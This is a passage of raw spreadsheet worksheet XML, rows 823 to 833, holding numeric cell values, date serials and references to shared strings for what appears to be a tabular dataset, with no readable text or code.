        <v>6392</v>
      </c>
      <c r="G823" s="1">
        <v>44225</v>
      </c>
      <c r="H823">
        <v>8066</v>
      </c>
      <c r="I823">
        <v>8066</v>
      </c>
      <c r="J823">
        <v>2</v>
      </c>
      <c r="K823">
        <v>1</v>
      </c>
      <c r="L823">
        <v>0</v>
      </c>
      <c r="M823">
        <v>2</v>
      </c>
      <c r="N823">
        <v>0</v>
      </c>
      <c r="O823">
        <v>0</v>
      </c>
      <c r="P823">
        <v>0</v>
      </c>
      <c r="Q823">
        <v>0</v>
      </c>
      <c r="R823">
        <v>10</v>
      </c>
      <c r="S823">
        <v>0</v>
      </c>
      <c r="T823">
        <v>0</v>
      </c>
      <c r="U823">
        <v>60000</v>
      </c>
      <c r="V823">
        <v>2000</v>
      </c>
      <c r="W823">
        <v>0</v>
      </c>
      <c r="X823">
        <v>3000</v>
      </c>
      <c r="Y823">
        <v>0</v>
      </c>
      <c r="Z823">
        <v>0</v>
      </c>
      <c r="AA823">
        <v>0</v>
      </c>
      <c r="AB823">
        <v>0</v>
      </c>
      <c r="AC823">
        <v>300</v>
      </c>
      <c r="AD823">
        <v>0</v>
      </c>
      <c r="AE823">
        <v>0</v>
      </c>
      <c r="AF823" t="s">
        <v>6393</v>
      </c>
      <c r="AG823">
        <v>90241</v>
      </c>
      <c r="AH823">
        <v>26</v>
      </c>
      <c r="AJ823">
        <v>420</v>
      </c>
      <c r="AK823" t="s">
        <v>331</v>
      </c>
      <c r="AL823" t="s">
        <v>332</v>
      </c>
      <c r="AM823" t="s">
        <v>6394</v>
      </c>
      <c r="AN823" t="s">
        <v>55</v>
      </c>
      <c r="AO823">
        <v>2001</v>
      </c>
      <c r="AP823" t="s">
        <v>6395</v>
      </c>
      <c r="AQ823" t="s">
        <v>6396</v>
      </c>
      <c r="AR823" t="s">
        <v>6393</v>
      </c>
      <c r="AS823" t="s">
        <v>71</v>
      </c>
      <c r="AT823" t="s">
        <v>58</v>
      </c>
      <c r="AU823">
        <v>26</v>
      </c>
      <c r="AV823">
        <v>0</v>
      </c>
      <c r="AW823">
        <v>0</v>
      </c>
      <c r="AX823">
        <v>0</v>
      </c>
      <c r="AY823">
        <v>28</v>
      </c>
      <c r="AZ823">
        <v>20</v>
      </c>
      <c r="BA823" t="s">
        <v>17034</v>
      </c>
      <c r="BB823" t="s">
        <v>15618</v>
      </c>
      <c r="BC823">
        <v>0</v>
      </c>
      <c r="BD823" t="s">
        <v>9785</v>
      </c>
    </row>
    <row r="824" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A824">
        <v>2203</v>
      </c>
      <c r="B824" t="s">
        <v>6397</v>
      </c>
      <c r="C824" t="s">
        <v>2308</v>
      </c>
      <c r="D824" t="s">
        <v>6305</v>
      </c>
      <c r="E824" t="s">
        <v>142</v>
      </c>
      <c r="F824" t="s">
        <v>6398</v>
      </c>
      <c r="G824" s="1">
        <v>44358</v>
      </c>
      <c r="H824">
        <v>8171</v>
      </c>
      <c r="I824">
        <v>8171</v>
      </c>
      <c r="J824">
        <v>1</v>
      </c>
      <c r="K824">
        <v>0</v>
      </c>
      <c r="L824">
        <v>3</v>
      </c>
      <c r="M824">
        <v>0</v>
      </c>
      <c r="N824">
        <v>0</v>
      </c>
      <c r="O824">
        <v>0</v>
      </c>
      <c r="P824">
        <v>0</v>
      </c>
      <c r="Q824">
        <v>5</v>
      </c>
      <c r="R824">
        <v>5</v>
      </c>
      <c r="S824">
        <v>0</v>
      </c>
      <c r="T824">
        <v>1</v>
      </c>
      <c r="U824">
        <v>200000</v>
      </c>
      <c r="V824">
        <v>0</v>
      </c>
      <c r="W824">
        <v>30000</v>
      </c>
      <c r="X824">
        <v>0</v>
      </c>
      <c r="Y824">
        <v>0</v>
      </c>
      <c r="Z824">
        <v>0</v>
      </c>
      <c r="AA824">
        <v>0</v>
      </c>
      <c r="AB824">
        <v>2000</v>
      </c>
      <c r="AC824">
        <v>2000</v>
      </c>
      <c r="AD824">
        <v>0</v>
      </c>
      <c r="AE824">
        <v>10000</v>
      </c>
      <c r="AF824" t="s">
        <v>6399</v>
      </c>
      <c r="AG824">
        <v>98415</v>
      </c>
      <c r="AH824">
        <v>33</v>
      </c>
      <c r="AJ824">
        <v>485</v>
      </c>
      <c r="AK824" t="s">
        <v>2313</v>
      </c>
      <c r="AL824" t="s">
        <v>2314</v>
      </c>
      <c r="AM824" t="s">
        <v>6400</v>
      </c>
      <c r="AN824" t="s">
        <v>68</v>
      </c>
      <c r="AO824">
        <v>2017</v>
      </c>
      <c r="AP824">
        <v>811486590</v>
      </c>
      <c r="AQ824" t="s">
        <v>6401</v>
      </c>
      <c r="AR824" t="s">
        <v>6399</v>
      </c>
      <c r="AS824" t="s">
        <v>71</v>
      </c>
      <c r="AT824" t="s">
        <v>72</v>
      </c>
      <c r="AU824">
        <v>20</v>
      </c>
      <c r="AV824">
        <v>1</v>
      </c>
      <c r="AW824">
        <v>4</v>
      </c>
      <c r="AX824">
        <v>3</v>
      </c>
      <c r="AY824">
        <v>6</v>
      </c>
      <c r="AZ824">
        <v>6</v>
      </c>
      <c r="BA824" t="s">
        <v>17084</v>
      </c>
      <c r="BB824" t="s">
        <v>15761</v>
      </c>
      <c r="BC824" t="s">
        <v>10642</v>
      </c>
      <c r="BD824" t="s">
        <v>9934</v>
      </c>
    </row>
    <row r="825" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A825">
        <v>1720</v>
      </c>
      <c r="B825" t="s">
        <v>6402</v>
      </c>
      <c r="C825" t="s">
        <v>607</v>
      </c>
      <c r="D825" t="s">
        <v>6403</v>
      </c>
      <c r="E825" t="s">
        <v>142</v>
      </c>
      <c r="F825" t="s">
        <v>1746</v>
      </c>
      <c r="G825" s="1">
        <v>44291</v>
      </c>
      <c r="H825">
        <v>8368</v>
      </c>
      <c r="I825">
        <v>8368</v>
      </c>
      <c r="J825">
        <v>2</v>
      </c>
      <c r="K825">
        <v>0</v>
      </c>
      <c r="L825">
        <v>0</v>
      </c>
      <c r="M825">
        <v>7</v>
      </c>
      <c r="N825">
        <v>0</v>
      </c>
      <c r="O825">
        <v>0</v>
      </c>
      <c r="P825">
        <v>0</v>
      </c>
      <c r="Q825">
        <v>6</v>
      </c>
      <c r="R825">
        <v>15</v>
      </c>
      <c r="S825">
        <v>0</v>
      </c>
      <c r="T825">
        <v>1</v>
      </c>
      <c r="U825">
        <v>500</v>
      </c>
      <c r="V825">
        <v>0</v>
      </c>
      <c r="W825">
        <v>0</v>
      </c>
      <c r="X825">
        <v>5500</v>
      </c>
      <c r="Y825">
        <v>0</v>
      </c>
      <c r="Z825">
        <v>0</v>
      </c>
      <c r="AA825">
        <v>0</v>
      </c>
      <c r="AB825">
        <v>5000</v>
      </c>
      <c r="AC825">
        <v>12000</v>
      </c>
      <c r="AD825">
        <v>0</v>
      </c>
      <c r="AE825">
        <v>10000</v>
      </c>
      <c r="AF825" t="s">
        <v>6404</v>
      </c>
      <c r="AG825">
        <v>77125</v>
      </c>
      <c r="AH825">
        <v>24</v>
      </c>
      <c r="AJ825">
        <v>370</v>
      </c>
      <c r="AK825" t="s">
        <v>675</v>
      </c>
      <c r="AL825" t="s">
        <v>5568</v>
      </c>
      <c r="AM825" t="s">
        <v>6405</v>
      </c>
      <c r="AN825" t="s">
        <v>55</v>
      </c>
      <c r="AO825">
        <v>2016</v>
      </c>
      <c r="AP825">
        <v>82132119992</v>
      </c>
      <c r="AQ825" t="s">
        <v>6406</v>
      </c>
      <c r="AR825" t="s">
        <v>6407</v>
      </c>
      <c r="AS825" t="s">
        <v>71</v>
      </c>
      <c r="AT825" t="s">
        <v>58</v>
      </c>
      <c r="AU825">
        <v>15</v>
      </c>
      <c r="AV825">
        <v>1</v>
      </c>
      <c r="AW825">
        <v>17</v>
      </c>
      <c r="AX825">
        <v>65</v>
      </c>
      <c r="AY825">
        <v>22</v>
      </c>
      <c r="AZ825">
        <v>87</v>
      </c>
      <c r="BA825" t="s">
        <v>16978</v>
      </c>
      <c r="BB825" t="s">
        <v>15473</v>
      </c>
      <c r="BC825" t="s">
        <v>9536</v>
      </c>
      <c r="BD825">
        <v>0</v>
      </c>
    </row>
    <row r="826" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A826">
        <v>1956</v>
      </c>
      <c r="B826" t="s">
        <v>6408</v>
      </c>
      <c r="C826" t="s">
        <v>318</v>
      </c>
      <c r="D826" t="s">
        <v>6409</v>
      </c>
      <c r="E826" t="s">
        <v>142</v>
      </c>
      <c r="F826" t="s">
        <v>5719</v>
      </c>
      <c r="G826" s="1">
        <v>44274</v>
      </c>
      <c r="H826">
        <v>8468</v>
      </c>
      <c r="I826">
        <v>8468</v>
      </c>
      <c r="J826">
        <v>2</v>
      </c>
      <c r="K826">
        <v>0</v>
      </c>
      <c r="L826">
        <v>3</v>
      </c>
      <c r="M826">
        <v>1</v>
      </c>
      <c r="N826">
        <v>0</v>
      </c>
      <c r="O826">
        <v>0</v>
      </c>
      <c r="P826">
        <v>0</v>
      </c>
      <c r="Q826">
        <v>5</v>
      </c>
      <c r="R826">
        <v>5</v>
      </c>
      <c r="S826">
        <v>1</v>
      </c>
      <c r="T826">
        <v>1</v>
      </c>
      <c r="U826">
        <v>400000</v>
      </c>
      <c r="V826">
        <v>0</v>
      </c>
      <c r="W826">
        <v>6000000</v>
      </c>
      <c r="X826">
        <v>1000</v>
      </c>
      <c r="Y826">
        <v>0</v>
      </c>
      <c r="Z826">
        <v>0</v>
      </c>
      <c r="AA826">
        <v>0</v>
      </c>
      <c r="AB826">
        <v>200</v>
      </c>
      <c r="AC826">
        <v>500</v>
      </c>
      <c r="AD826">
        <v>1</v>
      </c>
      <c r="AE826">
        <v>200000</v>
      </c>
      <c r="AF826" t="s">
        <v>6410</v>
      </c>
      <c r="AG826">
        <v>90245</v>
      </c>
      <c r="AH826">
        <v>26</v>
      </c>
      <c r="AJ826">
        <v>420</v>
      </c>
      <c r="AK826" t="s">
        <v>936</v>
      </c>
      <c r="AL826" t="s">
        <v>937</v>
      </c>
      <c r="AM826" t="s">
        <v>6411</v>
      </c>
      <c r="AN826" t="s">
        <v>55</v>
      </c>
      <c r="AO826">
        <v>2018</v>
      </c>
      <c r="AP826" t="s">
        <v>6412</v>
      </c>
      <c r="AQ826" t="s">
        <v>6413</v>
      </c>
      <c r="AR826" t="s">
        <v>6414</v>
      </c>
      <c r="AS826" t="s">
        <v>71</v>
      </c>
      <c r="AT826" t="s">
        <v>58</v>
      </c>
      <c r="AU826">
        <v>26</v>
      </c>
      <c r="AV826">
        <v>1</v>
      </c>
      <c r="AW826">
        <v>10</v>
      </c>
      <c r="AX826">
        <v>22</v>
      </c>
      <c r="AY826">
        <v>7</v>
      </c>
      <c r="AZ826">
        <v>9</v>
      </c>
      <c r="BA826" t="s">
        <v>17032</v>
      </c>
      <c r="BB826" t="s">
        <v>15275</v>
      </c>
      <c r="BC826">
        <v>0</v>
      </c>
      <c r="BD826" t="s">
        <v>12906</v>
      </c>
    </row>
    <row r="827" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A827">
        <v>2313</v>
      </c>
      <c r="B827" t="s">
        <v>6415</v>
      </c>
      <c r="C827" t="s">
        <v>3013</v>
      </c>
      <c r="D827" t="s">
        <v>6416</v>
      </c>
      <c r="E827" t="s">
        <v>843</v>
      </c>
      <c r="F827" t="s">
        <v>6417</v>
      </c>
      <c r="G827" s="1">
        <v>43861</v>
      </c>
      <c r="H827">
        <v>8829</v>
      </c>
      <c r="I827">
        <v>8829</v>
      </c>
      <c r="J827">
        <v>0</v>
      </c>
      <c r="K827">
        <v>0</v>
      </c>
      <c r="L827">
        <v>0</v>
      </c>
      <c r="M827">
        <v>0</v>
      </c>
      <c r="N827">
        <v>0</v>
      </c>
      <c r="O827">
        <v>0</v>
      </c>
      <c r="P827">
        <v>0</v>
      </c>
      <c r="Q827">
        <v>1</v>
      </c>
      <c r="R827">
        <v>50</v>
      </c>
      <c r="S827">
        <v>0</v>
      </c>
      <c r="T827">
        <v>1</v>
      </c>
      <c r="U827">
        <v>0</v>
      </c>
      <c r="V827">
        <v>0</v>
      </c>
      <c r="W827">
        <v>0</v>
      </c>
      <c r="X827">
        <v>0</v>
      </c>
      <c r="Y827">
        <v>0</v>
      </c>
      <c r="Z827">
        <v>0</v>
      </c>
      <c r="AA827">
        <v>0</v>
      </c>
      <c r="AB827">
        <v>100</v>
      </c>
      <c r="AC827">
        <v>5000</v>
      </c>
      <c r="AD827">
        <v>0</v>
      </c>
      <c r="AE827">
        <v>5000</v>
      </c>
      <c r="AF827" t="s">
        <v>6418</v>
      </c>
      <c r="AG827">
        <v>28823</v>
      </c>
      <c r="AH827">
        <v>4</v>
      </c>
      <c r="AJ827">
        <v>87</v>
      </c>
      <c r="AK827" t="s">
        <v>6419</v>
      </c>
      <c r="AL827" t="s">
        <v>6420</v>
      </c>
      <c r="AM827" t="s">
        <v>6421</v>
      </c>
      <c r="AN827" t="s">
        <v>55</v>
      </c>
      <c r="AO827">
        <v>2016</v>
      </c>
      <c r="AP827">
        <v>8127593580</v>
      </c>
      <c r="AQ827" t="s">
        <v>6422</v>
      </c>
      <c r="AR827" t="s">
        <v>6418</v>
      </c>
      <c r="AS827" t="s">
        <v>71</v>
      </c>
      <c r="AT827" t="s">
        <v>58</v>
      </c>
      <c r="AU827">
        <v>14</v>
      </c>
      <c r="AV827">
        <v>1</v>
      </c>
      <c r="AW827">
        <v>0</v>
      </c>
      <c r="AX827">
        <v>0</v>
      </c>
      <c r="AY827">
        <v>6</v>
      </c>
      <c r="AZ827">
        <v>1</v>
      </c>
      <c r="BA827" t="s">
        <v>17129</v>
      </c>
      <c r="BB827" t="s">
        <v>15824</v>
      </c>
      <c r="BC827">
        <v>0</v>
      </c>
      <c r="BD827" t="s">
        <v>9427</v>
      </c>
    </row>
    <row r="828" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A828">
        <v>1939</v>
      </c>
      <c r="B828" t="s">
        <v>6423</v>
      </c>
      <c r="C828" t="s">
        <v>318</v>
      </c>
      <c r="D828" t="s">
        <v>6424</v>
      </c>
      <c r="E828" t="s">
        <v>363</v>
      </c>
      <c r="F828" t="s">
        <v>364</v>
      </c>
      <c r="G828" s="1">
        <v>44280</v>
      </c>
      <c r="H828">
        <v>8860</v>
      </c>
      <c r="I828">
        <v>8860</v>
      </c>
      <c r="J828">
        <v>0</v>
      </c>
      <c r="K828">
        <v>0</v>
      </c>
      <c r="L828">
        <v>0</v>
      </c>
      <c r="M828">
        <v>0</v>
      </c>
      <c r="N828">
        <v>0</v>
      </c>
      <c r="O828">
        <v>0</v>
      </c>
      <c r="P828">
        <v>0</v>
      </c>
      <c r="Q828">
        <v>0</v>
      </c>
      <c r="R828">
        <v>0</v>
      </c>
      <c r="S828">
        <v>0</v>
      </c>
      <c r="T828">
        <v>1</v>
      </c>
      <c r="U828">
        <v>0</v>
      </c>
      <c r="V828">
        <v>0</v>
      </c>
      <c r="W828">
        <v>0</v>
      </c>
      <c r="X828">
        <v>0</v>
      </c>
      <c r="Y828">
        <v>0</v>
      </c>
      <c r="Z828">
        <v>0</v>
      </c>
      <c r="AA828">
        <v>0</v>
      </c>
      <c r="AB828">
        <v>0</v>
      </c>
      <c r="AC828">
        <v>0</v>
      </c>
      <c r="AD828">
        <v>0</v>
      </c>
      <c r="AE828">
        <v>50000</v>
      </c>
      <c r="AF828" t="s">
        <v>6425</v>
      </c>
      <c r="AG828">
        <v>92261</v>
      </c>
      <c r="AH828">
        <v>26</v>
      </c>
      <c r="AJ828">
        <v>403</v>
      </c>
      <c r="AK828" t="s">
        <v>6426</v>
      </c>
      <c r="AL828" t="s">
        <v>6427</v>
      </c>
      <c r="AM828" t="s">
        <v>6428</v>
      </c>
      <c r="AN828" t="s">
        <v>55</v>
      </c>
      <c r="AO828">
        <v>1992</v>
      </c>
      <c r="AP828" t="s">
        <v>6429</v>
      </c>
      <c r="AQ828" t="s">
        <v>6430</v>
      </c>
      <c r="AR828" t="s">
        <v>6425</v>
      </c>
      <c r="AS828" t="s">
        <v>371</v>
      </c>
      <c r="AT828" t="s">
        <v>58</v>
      </c>
      <c r="AU828">
        <v>20</v>
      </c>
      <c r="AV828">
        <v>1</v>
      </c>
      <c r="AW828">
        <v>2</v>
      </c>
      <c r="AX828">
        <v>8</v>
      </c>
      <c r="AY828">
        <v>3</v>
      </c>
      <c r="AZ828">
        <v>2</v>
      </c>
      <c r="BA828" t="s">
        <v>17028</v>
      </c>
      <c r="BB828" t="s">
        <v>15308</v>
      </c>
      <c r="BC828" t="s">
        <v>9536</v>
      </c>
      <c r="BD828" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="829" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A829">
        <v>1746</v>
      </c>
      <c r="B829" t="s">
        <v>6431</v>
      </c>
      <c r="C829" t="s">
        <v>157</v>
      </c>
      <c r="D829" t="s">
        <v>6432</v>
      </c>
      <c r="E829" t="s">
        <v>826</v>
      </c>
      <c r="F829" t="s">
        <v>6433</v>
      </c>
      <c r="G829" s="1">
        <v>44343</v>
      </c>
      <c r="H829">
        <v>9000</v>
      </c>
      <c r="I829">
        <v>9000</v>
      </c>
      <c r="J829">
        <v>0</v>
      </c>
      <c r="K829">
        <v>1</v>
      </c>
      <c r="L829">
        <v>0</v>
      </c>
      <c r="M829">
        <v>0</v>
      </c>
      <c r="N829">
        <v>0</v>
      </c>
      <c r="O829">
        <v>0</v>
      </c>
      <c r="P829">
        <v>0</v>
      </c>
      <c r="Q829">
        <v>0</v>
      </c>
      <c r="R829">
        <v>0</v>
      </c>
      <c r="S829">
        <v>0</v>
      </c>
      <c r="T829">
        <v>0</v>
      </c>
      <c r="U829">
        <v>0</v>
      </c>
      <c r="V829">
        <v>20000</v>
      </c>
      <c r="W829">
        <v>0</v>
      </c>
      <c r="X829">
        <v>0</v>
      </c>
      <c r="Y829">
        <v>0</v>
      </c>
      <c r="Z829">
        <v>0</v>
      </c>
      <c r="AA829">
        <v>0</v>
      </c>
      <c r="AB829">
        <v>0</v>
      </c>
      <c r="AC829">
        <v>0</v>
      </c>
      <c r="AD829">
        <v>0</v>
      </c>
      <c r="AE829">
        <v>0</v>
      </c>
      <c r="AF829" t="s">
        <v>6434</v>
      </c>
      <c r="AG829">
        <v>61273</v>
      </c>
      <c r="AH829">
        <v>16</v>
      </c>
      <c r="AJ829">
        <v>242</v>
      </c>
      <c r="AK829" t="s">
        <v>3039</v>
      </c>
      <c r="AL829" t="s">
        <v>6435</v>
      </c>
      <c r="AM829" t="s">
        <v>6436</v>
      </c>
      <c r="AN829" t="s">
        <v>55</v>
      </c>
      <c r="AO829">
        <v>2014</v>
      </c>
      <c r="AP829" t="s">
        <v>6437</v>
      </c>
      <c r="AQ829" t="s">
        <v>6438</v>
      </c>
      <c r="AR829" t="s">
        <v>729</v>
      </c>
      <c r="AS829" t="s">
        <v>71</v>
      </c>
      <c r="AT829" t="s">
        <v>58</v>
      </c>
      <c r="AU829">
        <v>26</v>
      </c>
      <c r="AV829">
        <v>3</v>
      </c>
      <c r="AW829">
        <v>52</v>
      </c>
      <c r="AX829">
        <v>2</v>
      </c>
      <c r="AY829">
        <v>13</v>
      </c>
      <c r="AZ829">
        <v>2</v>
      </c>
      <c r="BA829">
        <v>0</v>
      </c>
      <c r="BB829">
        <v>0</v>
      </c>
      <c r="BC829" t="s">
        <v>13162</v>
      </c>
      <c r="BD829" t="s">
        <v>12464</v>
      </c>
    </row>
    <row r="830" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A830">
        <v>1953</v>
      </c>
      <c r="B830" t="s">
        <v>6439</v>
      </c>
      <c r="C830" t="s">
        <v>99</v>
      </c>
      <c r="D830" t="s">
        <v>6440</v>
      </c>
      <c r="E830" t="s">
        <v>142</v>
      </c>
      <c r="F830" t="s">
        <v>6441</v>
      </c>
      <c r="G830" s="1">
        <v>44327</v>
      </c>
      <c r="H830">
        <v>9373</v>
      </c>
      <c r="I830">
        <v>9373</v>
      </c>
      <c r="J830">
        <v>1</v>
      </c>
      <c r="K830">
        <v>0</v>
      </c>
      <c r="L830">
        <v>0</v>
      </c>
      <c r="M830">
        <v>1</v>
      </c>
      <c r="N830">
        <v>0</v>
      </c>
      <c r="O830">
        <v>0</v>
      </c>
      <c r="P830">
        <v>0</v>
      </c>
      <c r="Q830">
        <v>4</v>
      </c>
      <c r="R830">
        <v>0</v>
      </c>
      <c r="S830">
        <v>0</v>
      </c>
      <c r="T830">
        <v>0</v>
      </c>
      <c r="U830">
        <v>200000</v>
      </c>
      <c r="V830">
        <v>0</v>
      </c>
      <c r="W830">
        <v>0</v>
      </c>
      <c r="X830">
        <v>1000</v>
      </c>
      <c r="Y830">
        <v>0</v>
      </c>
      <c r="Z830">
        <v>0</v>
      </c>
      <c r="AA830">
        <v>0</v>
      </c>
      <c r="AB830">
        <v>100</v>
      </c>
      <c r="AC830">
        <v>0</v>
      </c>
      <c r="AD830">
        <v>0</v>
      </c>
      <c r="AE830">
        <v>0</v>
      </c>
      <c r="AF830" t="s">
        <v>6442</v>
      </c>
      <c r="AG830">
        <v>14450</v>
      </c>
      <c r="AH830">
        <v>12</v>
      </c>
      <c r="AJ830">
        <v>160</v>
      </c>
      <c r="AK830" t="s">
        <v>114</v>
      </c>
      <c r="AL830" t="s">
        <v>115</v>
      </c>
      <c r="AM830" t="s">
        <v>6443</v>
      </c>
      <c r="AN830" t="s">
        <v>55</v>
      </c>
      <c r="AO830">
        <v>2019</v>
      </c>
      <c r="AP830" t="s">
        <v>6444</v>
      </c>
      <c r="AQ830" t="s">
        <v>6445</v>
      </c>
      <c r="AR830" t="s">
        <v>6442</v>
      </c>
      <c r="AS830" t="s">
        <v>179</v>
      </c>
      <c r="AT830" t="s">
        <v>58</v>
      </c>
      <c r="AU830">
        <v>0</v>
      </c>
      <c r="AV830">
        <v>0</v>
      </c>
      <c r="AW830">
        <v>0</v>
      </c>
      <c r="AX830">
        <v>0</v>
      </c>
      <c r="AY830">
        <v>20</v>
      </c>
      <c r="AZ830">
        <v>15</v>
      </c>
      <c r="BA830" t="s">
        <v>17031</v>
      </c>
      <c r="BB830" t="s">
        <v>15609</v>
      </c>
      <c r="BC830" t="s">
        <v>13616</v>
      </c>
      <c r="BD830" t="s">
        <v>13463</v>
      </c>
    </row>
    <row r="831" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A831">
        <v>1781</v>
      </c>
      <c r="B831" t="s">
        <v>6446</v>
      </c>
      <c r="C831" t="s">
        <v>168</v>
      </c>
      <c r="D831" t="s">
        <v>6447</v>
      </c>
      <c r="E831" t="s">
        <v>131</v>
      </c>
      <c r="F831" t="s">
        <v>3462</v>
      </c>
      <c r="G831" s="1">
        <v>44313</v>
      </c>
      <c r="H831">
        <v>9416</v>
      </c>
      <c r="I831">
        <v>9416</v>
      </c>
      <c r="J831">
        <v>0</v>
      </c>
      <c r="K831">
        <v>0</v>
      </c>
      <c r="L831">
        <v>0</v>
      </c>
      <c r="M831">
        <v>0</v>
      </c>
      <c r="N831">
        <v>0</v>
      </c>
      <c r="O831">
        <v>0</v>
      </c>
      <c r="P831">
        <v>0</v>
      </c>
      <c r="Q831">
        <v>3</v>
      </c>
      <c r="R831">
        <v>3</v>
      </c>
      <c r="S831">
        <v>0</v>
      </c>
      <c r="T831">
        <v>1</v>
      </c>
      <c r="U831">
        <v>0</v>
      </c>
      <c r="V831">
        <v>0</v>
      </c>
      <c r="W831">
        <v>0</v>
      </c>
      <c r="X831">
        <v>0</v>
      </c>
      <c r="Y831">
        <v>0</v>
      </c>
      <c r="Z831">
        <v>0</v>
      </c>
      <c r="AA831">
        <v>0</v>
      </c>
      <c r="AB831">
        <v>1</v>
      </c>
      <c r="AC831">
        <v>1</v>
      </c>
      <c r="AD831">
        <v>0</v>
      </c>
      <c r="AE831">
        <v>500</v>
      </c>
      <c r="AF831" t="s">
        <v>6448</v>
      </c>
      <c r="AG831">
        <v>16810</v>
      </c>
      <c r="AH831">
        <v>13</v>
      </c>
      <c r="AJ831">
        <v>161</v>
      </c>
      <c r="AK831" t="s">
        <v>1479</v>
      </c>
      <c r="AL831" t="s">
        <v>6449</v>
      </c>
      <c r="AM831" t="s">
        <v>6450</v>
      </c>
      <c r="AN831" t="s">
        <v>55</v>
      </c>
      <c r="AO831">
        <v>2010</v>
      </c>
      <c r="AP831" t="s">
        <v>6451</v>
      </c>
      <c r="AQ831" t="s">
        <v>6452</v>
      </c>
      <c r="AR831" t="s">
        <v>6448</v>
      </c>
      <c r="AS831" t="s">
        <v>71</v>
      </c>
      <c r="AT831" t="s">
        <v>58</v>
      </c>
      <c r="AU831">
        <v>25</v>
      </c>
      <c r="AV831">
        <v>3</v>
      </c>
      <c r="AW831">
        <v>33</v>
      </c>
      <c r="AX831">
        <v>1</v>
      </c>
      <c r="AY831">
        <v>49</v>
      </c>
      <c r="AZ831">
        <v>8</v>
      </c>
      <c r="BA831" t="s">
        <v>16995</v>
      </c>
      <c r="BB831" t="s">
        <v>15508</v>
      </c>
      <c r="BC831">
        <v>0</v>
      </c>
      <c r="BD831" t="s">
        <v>13318</v>
      </c>
    </row>
    <row r="832" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A832">
        <v>2204</v>
      </c>
      <c r="B832" t="s">
        <v>6453</v>
      </c>
      <c r="C832" t="s">
        <v>47</v>
      </c>
      <c r="D832" t="s">
        <v>6454</v>
      </c>
      <c r="E832" t="s">
        <v>363</v>
      </c>
      <c r="F832" t="s">
        <v>1139</v>
      </c>
      <c r="G832" s="1">
        <v>44361</v>
      </c>
      <c r="H832">
        <v>9468</v>
      </c>
      <c r="I832">
        <v>9468</v>
      </c>
      <c r="J832">
        <v>8</v>
      </c>
      <c r="K832">
        <v>0</v>
      </c>
      <c r="L832">
        <v>0</v>
      </c>
      <c r="M832">
        <v>0</v>
      </c>
      <c r="N832">
        <v>0</v>
      </c>
      <c r="O832">
        <v>0</v>
      </c>
      <c r="P832">
        <v>0</v>
      </c>
      <c r="Q832">
        <v>0</v>
      </c>
      <c r="R832">
        <v>0</v>
      </c>
      <c r="S832">
        <v>1</v>
      </c>
      <c r="T832">
        <v>0</v>
      </c>
      <c r="U832">
        <v>500000</v>
      </c>
      <c r="V832">
        <v>0</v>
      </c>
      <c r="W832">
        <v>0</v>
      </c>
      <c r="X832">
        <v>0</v>
      </c>
      <c r="Y832">
        <v>0</v>
      </c>
      <c r="Z832">
        <v>0</v>
      </c>
      <c r="AA832">
        <v>0</v>
      </c>
      <c r="AB832">
        <v>0</v>
      </c>
      <c r="AC832">
        <v>0</v>
      </c>
      <c r="AD832">
        <v>1</v>
      </c>
      <c r="AE832">
        <v>0</v>
      </c>
      <c r="AF832" t="s">
        <v>6455</v>
      </c>
      <c r="AG832">
        <v>20371</v>
      </c>
      <c r="AH832">
        <v>2</v>
      </c>
      <c r="AJ832">
        <v>35</v>
      </c>
      <c r="AK832" t="s">
        <v>471</v>
      </c>
      <c r="AL832" t="s">
        <v>6456</v>
      </c>
      <c r="AM832" t="s">
        <v>6457</v>
      </c>
      <c r="AN832" t="s">
        <v>55</v>
      </c>
      <c r="AO832">
        <v>2015</v>
      </c>
      <c r="AP832" t="s">
        <v>6458</v>
      </c>
      <c r="AQ832" t="s">
        <v>6459</v>
      </c>
      <c r="AR832" t="s">
        <v>6460</v>
      </c>
      <c r="AS832" t="s">
        <v>71</v>
      </c>
      <c r="AT832" t="s">
        <v>58</v>
      </c>
      <c r="AU832">
        <v>0</v>
      </c>
      <c r="AV832">
        <v>0</v>
      </c>
      <c r="AW832">
        <v>0</v>
      </c>
      <c r="AX832">
        <v>0</v>
      </c>
      <c r="AY832">
        <v>0</v>
      </c>
      <c r="AZ832">
        <v>20</v>
      </c>
      <c r="BA832" t="s">
        <v>17085</v>
      </c>
      <c r="BB832" t="s">
        <v>15762</v>
      </c>
      <c r="BC832">
        <v>0</v>
      </c>
      <c r="BD832" t="s">
        <v>13329</v>
      </c>
    </row>
    <row r="833" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A833">
        <v>1748</v>
      </c>
      <c r="B833" t="s">
        <v>6461</v>
      </c>
      <c r="C833" t="s">
        <v>157</v>
      </c>
      <c r="D833" t="s">
        <v>6462</v>
      </c>
      <c r="E833" t="s">
        <v>1206</v>
      </c>
      <c r="F833" t="s">
        <v>1207</v>
      </c>
      <c r="G833" s="1">
        <v>44337</v>
      </c>
      <c r="H833">
        <v>9620</v>
      </c>
      <c r="I833">
        <v>9620</v>
      </c>
      <c r="J833">
        <v>0</v>
      </c>
      <c r="K833">
        <v>1</v>
      </c>
      <c r="L833">
        <v>0</v>
      </c>
      <c r="M833">
        <v>0</v>
      </c>
      <c r="N833">
        <v>0</v>
      </c>
      <c r="O833">
        <v>0</v>
      </c>
      <c r="P833">
        <v>0</v>
      </c>
      <c r="Q833">
        <v>0</v>
      </c>
      <c r="R833">
        <v>4</v>
      </c>
      <c r="S833">
        <v>0</v>
      </c>
      <c r="T833">
        <v>0</v>
      </c>
      <c r="U833">
        <v>0</v>
      </c>
      <c r="V833">
        <v>40000</v>
      </c>
      <c r="W833">
        <v>0</v>
      </c>
      <c r="X833">
        <v>0</v>
      </c>
      <c r="Y833">
        <v>0</v>
      </c>
      <c r="Z833">
        <v>0</v>
      </c>
      <c r="AA833">
        <v>0</v>
      </c>
      <c r="AB833">
        <v>0</v>
      </c>
      <c r="AC833">
        <v>1000</v>
      </c>
      <c r="AD833">
        <v>0</v>
      </c>
      <c r="AE833">
        <v>0</v>
      </c>
      <c r="AF833" t="s">
        <v>6463</v>
      </c>
      <c r="AG833">
        <v>61177</v>
      </c>
      <c r="AH833">
        <v>16</v>
